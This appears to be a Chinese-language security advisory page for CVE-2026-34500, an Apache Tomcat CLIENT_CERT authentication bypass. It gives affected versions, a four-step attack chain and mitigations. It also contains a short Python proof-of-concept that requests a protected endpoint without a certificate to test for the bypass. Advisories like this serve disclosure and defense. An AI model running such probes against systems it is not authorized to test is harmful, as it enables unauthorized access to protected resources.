IPBUF安全漏洞报告
English
CVE-2026-34500 CVSS 6.5 中危

CVE-2026-34500 Apache Tomcat CLIENT_CERT认证绕过漏洞

披露日期: 2026-04-09

漏洞信息

漏洞编号
CVE-2026-34500
漏洞类型
认证绕过
CVSS评分
6.5 中危
攻击向量
网络 (AV:N)
认证要求
无需认证 (PR:N)
用户交互
无需交互 (UI:N)
影响产品
Apache Tomcat

相关标签

认证绕过Apache TomcatWeb安全CVE-2026-34500Client Cert

漏洞概述

Apache Tomcat在特定配置场景下存在安全漏洞。当系统禁用了软失败模式并使用FFM时,CLIENT_CERT认证机制未能按预期对无效请求进行拦截。这可能导致未经身份验证的攻击者绕过客户端证书验证,从而访问受保护的Web资源。该漏洞影响了多个Tomcat版本分支,建议管理员尽快评估风险并应用官方提供的修复补丁。

技术细节

该漏洞源于Apache Tomcat在处理SSL/TLS客户端证书认证时的逻辑缺陷。在受影响版本中,当Tomcat配置为要求客户端证书认证(CLIENT_CERT),并且同时满足“软失败”被禁用以及启用了FFM(Foreign Function Memory相关功能或特定特性)的条件时,认证校验流程存在异常。正常情况下,若客户端未提供有效证书,服务器应终止连接或返回错误。然而,由于此漏洞,服务器错误地允许了请求通过。攻击者可利用网络向量(AV:N),无需用户交互(UI:N)且无需任何预先认证(PR:N),即可发起攻击。成功利用此漏洞可能导致敏感信息泄露(机密性影响高)以及低程度的完整性破坏。

攻击链分析

STEP 1
信息收集
攻击者识别目标服务器运行的是受影响版本的Apache Tomcat(9.0.92-116, 10.1.22-53, 或 11.0.0-M14-20)。
STEP 2
配置探测
攻击者探测目标是否配置了CLIENT_CERT认证,并确认是否启用了FFM且禁用了软失败模式。
STEP 3
发起攻击
攻击者向受保护的端点发送HTTP请求,且不附带有效的客户端证书。
STEP 4
绕过认证
由于漏洞存在,Tomcat未正确拒绝请求,攻击者成功绕过认证机制获取受限资源。

PoC / 利用代码

⚠️ 仅供安全研究
以下代码仅用于安全研究和授权测试,未经授权使用属于违法行为。
PoC
import requests # Target URL that requires CLIENT_CERT authentication # Replace with the actual vulnerable endpoint target_url = "https://example.com/protected/admin" try: # Send a request without providing a client certificate # In a vulnerable configuration, this might return 200 OK instead of 403 response = requests.get(target_url, verify=False, timeout=10) if response.status_code == 200: print("[+] Vulnerability confirmed! Authentication bypassed.") print("[+] Response body snippet:", response.text[:100]) elif response.status_code == 403 or response.status_code == 401: print("[-] Authentication is enforced properly.") else: print(f"[?] Unexpected status code: {response.status_code}") except Exception as e: print(f"Error connecting to target: {e}")

影响范围

Apache Tomcat 11.0.0-M14 through 11.0.20
Apache Tomcat 10.1.22 through 10.1.53
Apache Tomcat 9.0.92 through 9.0.116

防御指南

临时缓解措施
如果无法立即升级,建议检查并暂时禁用FFM功能,或者在配置允许的情况下启用软失败模式,以缓解认证绕过的风险,直至完成版本更新。

参考链接

快速导航: 前沿安全 最新收录域名列表 最新威胁情报列表 最新网站排名列表 最新工具资源列表 最新CVE漏洞列表